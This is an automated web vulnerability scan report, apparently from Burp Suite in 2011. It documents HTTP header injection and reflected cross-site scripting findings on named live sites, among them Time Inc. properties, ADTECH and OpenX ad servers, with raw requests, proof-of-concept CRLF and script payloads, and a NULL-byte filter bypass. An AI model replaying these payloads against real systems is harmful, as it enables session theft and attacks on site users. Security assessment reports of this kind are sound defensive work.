HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 10bc5%0d%0ac7388fd636e was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 60b44%0d%0a1dbf3b28d86 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the code request parameter is copied into the Location response header. The payload 25157%0d%0a7c98215d65e was submitted in the code parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload 616b0%0d%0acd664a2ced8 was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload c5071%0d%0adb9e40e93e6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c5071%0d%0adb9e40e93e6/mail/dnp/privacy_centralized.cgi/time?dnp_source=E HTTP/1.1
Host: cgi.timeinc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.pathfinder.c ...[SNIP]...
The value of REST URL parameter 4 is copied into the Location response header. The payload 5d495%0d%0a11171e271ae was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /cgi-bin/mail/dnp/5d495%0d%0a11171e271ae/time?dnp_source=E HTTP/1.1
Host: cgi.timeinc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://subscription.tim ...[SNIP]...
The value of REST URL parameter 5 is copied into the Location response header. The payload adc03%0d%0a65009c68769 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /cgi-bin/mail/dnp/privacy_centralized.cgi/adc03%0d%0a65009c68769?dnp_source=E HTTP/1.1
Host: cgi.timeinc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search.time.com/results.html?N=0&Nty=1&p=0&cmd=tags&srchCat=Full+Archive&Ntt=xss+bond+interest&x=0&y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://subscription.tim ...[SNIP]...
2. Cross-site scripting (reflected)
There are 78 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload fdb05<script>alert(1)</script>c67450030ae was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:16:15 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2509
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "755767fdb05<script>alert(1)</script>c67450030ae"
The value of the placementId request parameter is copied into an HTML comment. The payload 9d43e--><script>alert(1)</script>be28fd24e1f was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:12 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3365
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "13914279d43e--><script>alert(1)</script>be28fd24e1f" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload ea8d4--><script>alert(1)</script>64e83b686e4 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:33 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3804
Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1ea8d4--><script>alert(1)</script>64e83b686e4" -->
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453c5"><script>alert(1)</script>0603925a1fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0453c5"><script>alert(1)</script>0603925a1fd/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 199a0"><script>alert(1)</script>df5fd8c38aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235199a0"><script>alert(1)</script>df5fd8c38aa/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50d2f"><script>alert(1)</script>21443c2e9ce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/113160650d2f"><script>alert(1)</script>21443c2e9ce/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a57"><script>alert(1)</script>543e86ef6a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0d0a57"><script>alert(1)</script>543e86ef6a/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a95f2"><script>alert(1)</script>3db595fe01d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154a95f2"><script>alert(1)</script>3db595fe01d/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dbf9"><script>alert(1)</script>7d23282b3a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH2dbf9"><script>alert(1)</script>7d23282b3a;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293
The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebf35"><script>alert(1)</script>9556b7afb58 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001ebf35"><script>alert(1)</script>9556b7afb58 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294
2.11. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /adiframe/3.0/5235/1131606/0/154/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60db"><script>alert(1)</script>bc3a3c9803f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&d60db"><script>alert(1)</script>bc3a3c9803f=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 68bb7<script>alert(1)</script>1aa098db945 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ccc1b<script>alert(1)</script>98e30e33e4a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 37730<img%20src%3da%20onerror%3dalert(1)>18fe03cfb64 was submitted in the longUrl parameter. This input was echoed as 37730<img src=a onerror=alert(1)>18fe03cfb64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 15621<script>alert(1)</script>a006cc605e8 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:53 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 68b29<script>alert(1)</script>6aabb981620 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 56bed<script>alert(1)</script>e111db97095 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa2cc</script><script>alert(1)</script>6bb22505598 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebf0</script><script>alert(1)</script>37cf171afc2 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.20. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d.tradex.openx.com
Path: /afr.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fc03</script><script>alert(1)</script>58f5bcbff52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd50</script><script>alert(1)</script>3c853cdd483 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c89ff"><script>alert(1)</script>931bd4c1ff1 was submitted in the REST URL parameter 1. This input was echoed as c89ff"><script>alert(1)</script>931bd4c1ff1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004ce53"><script>alert(1)</script>e1f90b16954 was submitted in the REST URL parameter 2. This input was echoed as 4ce53"><script>alert(1)</script>e1f90b16954 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c62'%3balert(1)//28451474222 was submitted in the mpck parameter. This input was echoed as b4c62';alert(1)//28451474222 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49a89"-alert(1)-"4df1bbdd434 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ac11"%3balert(1)//45013e6faf9 was submitted in the mpvc parameter. This input was echoed as 4ac11";alert(1)//45013e6faf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc5b9'%3balert(1)//1cd668fef70 was submitted in the mpvc parameter. This input was echoed as fc5b9';alert(1)//1cd668fef70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 85a9e<script>alert(1)</script>9b11c9e93dc was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 508ec<img%20src%3da%20onerror%3dalert(1)>615ba25ad1 was submitted in the request_id parameter. This input was echoed as 508ec<img src=a onerror=alert(1)>615ba25ad1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /bubble/?request_id=EEEXFUJYLF508ec<img%20src%3da%20onerror%3dalert(1)>615ba25ad1&respond_path=LINGO.connect&try=1&key=EEEXFUJYLF&lm=1317843032000&url=http%3A//www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005&title=Rick%20Perry%20Raises%20%2417%20Million%20in%20Third%20Quarter%20-%20Rebecca%20Kaplan%20-%20NationalJournal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 14:31:51 GMT
Server: Google Frontend
Content-Length: 109
The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 7c837<script>alert(1)</script>44b0427890c was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bubble/?request_id=EEEXFUJYLF&respond_path=LINGO.connect7c837<script>alert(1)</script>44b0427890c&try=1&key=EEEXFUJYLF&lm=1317843032000&url=http%3A//www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005&title=Rick%20Perry%20Raises%20%2417%20Million%20in%20Third%20Quarter%20-%20Rebecca%20Kaplan%20-%20NationalJournal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 14:31:54 GMT
Server: Google Frontend
Content-Length: 107
2.31. http://moneyland.time.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://moneyland.time.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f94c"><script>alert(1)</script>ec15378cf14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f94c\"><script>alert(1)</script>ec15378cf14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:41:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://moneyland.time.com/xmlrpc.php
Link: <http://wp.me/xxA6>; rel=shortlink
Content-Length: 119197
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5b016<script>alert(1)</script>74d967ff502 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
